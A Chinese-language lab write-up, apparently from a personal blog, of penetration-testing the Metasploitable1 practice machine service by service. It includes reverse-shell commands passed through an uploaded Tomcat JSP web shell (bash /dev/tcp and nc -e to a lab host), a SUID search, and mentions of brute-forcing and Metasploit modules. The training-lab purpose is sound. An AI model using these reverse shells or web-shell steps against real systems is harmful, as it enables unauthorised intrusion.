Metasploitable1
信息收集
端口信息收集
漏洞
8180-tomcat
弱密码
上传war 包
1
http://192.168.79.186:8180/cmd/cmd.jsp?cmd=/bin/sh -i >& /dev/tcp/192.168.79.137/19999 0>&1
发现不行,尝试使用nc 进行反弹shell
1
http://192.168.79.186:8180/cmd/cmd.jsp?cmd=nc -e /bin/bash 192.168.79.137 19999
上线msf
找了一个路径,上传,发现执行不了
uname -a
上传32位
貌似小马拉大马拉不过去
理解了handler 的payload 没有改,改了之后就能上线了
尝试大马
大马反而不太行
尝试提权
发现时符合脏牛的范围,但是并不是很想用,会破坏操作系统
上传一个收集信息的脚本
空余时间尝试suid 进行提权
不出意料完全没有成功
1
find / -perm -u=s -type f 2>/dev/null
结合
21-ftp
尝试爆破
等了一会发现,没有成功
22-ssh
尝试爆破
尝试,发现没有成功
23-telnet
还是先尝试爆破
都不是弱口令
25-smtp
无法利用
53-domain
可以进行dns 劫持
80-tikiwiki
尝试文件路径爆破
发现版本
tikiwiki 1.9.5
发现存在payload
msf 也是存在的
成功连接,但是这个可以发现,必须嗲有参数 -vn
445-samba
尝试使用msf 检测一下
中了
3306-mysql
尝试爆破弱密码
3632-distccd
尝试
尝试提权
Metasploitable1
https://tsy244.github.io/2024/04/28/靶场记录/Metasploitable1/